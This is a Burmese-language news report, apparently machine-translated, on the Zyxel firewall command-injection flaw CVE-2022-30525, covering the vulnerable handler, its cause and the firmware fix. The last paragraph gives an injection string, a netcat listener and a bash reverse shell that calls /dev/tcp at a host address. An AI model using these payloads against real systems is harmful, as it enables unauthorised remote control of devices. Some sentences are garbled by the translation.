စစ်မှန်ကြောင်းအထောက်အထားမရှိဘဲ ကုဒ်လုပ်ဆောင်မှုကို ခွင့်ပြုသည့် Zyxel firewalls တွင် အားနည်းချက်

အရေးပါသော အားနည်းချက် (CVE-2022-30525) ကို ATP၊ VPN နှင့် USG FLEX စီးရီးများ၏ Zyxel စက်ပစ္စည်းများတွင် ရှာဖွေတွေ့ရှိခဲ့ပြီး လုပ်ငန်းများတွင် firewalls, IDS နှင့် VPN များ၏ လုပ်ဆောင်ချက်ကို စုစည်းရန် ဒီဇိုင်းထုတ်ထားပြီး၊ ပြင်ပတိုက်ခိုက်သူမှ ကုဒ်ကို execute လုပ်ခွင့်ပြုသည်။ အထောက်အထားမခိုင်လုံဘဲ အသုံးပြုသူအခွင့်အရေးမပါဘဲ စက်။ တိုက်ခိုက်မှုတစ်ခုလုပ်ဆောင်ရန်၊ တိုက်ခိုက်သူသည် HTTP/HTTPS ပရိုတိုကောကို အသုံးပြု၍ စက်ပစ္စည်းသို့ တောင်းဆိုချက်များကို ပေးပို့နိုင်ရပါမည်။ Zyxel သည် ZLD 5.30 firmware အပ်ဒိတ်တွင် အားနည်းချက်ကို ပြင်ဆင်ထားသည်။ Shodan ဝန်ဆောင်မှုအရ၊ လက်ရှိတွင် HTTP/HTTPS မှတစ်ဆင့် တောင်းဆိုမှုများကို လက်ခံသည့် ကမ္ဘာလုံးဆိုင်ရာကွန်ရက်တွင် အားနည်းချက်ဖြစ်နိုင်သည့် စက်ပစ္စည်း 16213 ခုရှိသည်။

အထောက်အထားမခိုင်လုံဘဲ ဝင်ရောက်နိုင်သော ဝဘ်ကိုင်တွယ်သူ /ztp/cgi-bin/handler သို့ အထူးဒီဇိုင်းထုတ်ထားသော အမိန့်များ ပေးပို့ခြင်းဖြင့် လုပ်ဆောင်ချက်ကို လုပ်ဆောင်ပါသည်။ ပြဿနာသည် lib_wan_settings.py စာကြည့်တိုက်တွင်အသုံးပြုသော os.system ခေါ်ဆိုမှုကို အသုံးပြု၍ စနစ်ပေါ်ရှိ command များကိုလုပ်ဆောင်သည့်အခါ တောင်းဆိုမှုဘောင်များကို သင့်လျော်စွာရှင်းလင်းမှုမရှိခြင်းကြောင့်ဖြစ်ရခြင်းမှာ ပြဿနာဖြစ်ရခြင်းမှာ setWanPortSt လုပ်ဆောင်ချက်ကို လုပ်ဆောင်ရာတွင် လုပ်ဆောင်ခြင်းဖြစ်သည်။

ဥပမာအားဖြင့်၊ တိုက်ခိုက်သူသည် string “; ping 192.168.1.210;" ၎င်းသည် စနစ်ပေါ်ရှိ “ping 192.168.1.210” အမိန့်ကို အကောင်အထည်ဖော်ရန် ဦးတည်မည်ဖြစ်သည်။ command shell သို့ဝင်ရောက်ခွင့်ရရန်၊ သင်သည်သင်၏စနစ်တွင် "nc -lvnp 1270" ကို run နိုင်ပြီး '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'။

source: opennet.ru

မှတ်ချက် Add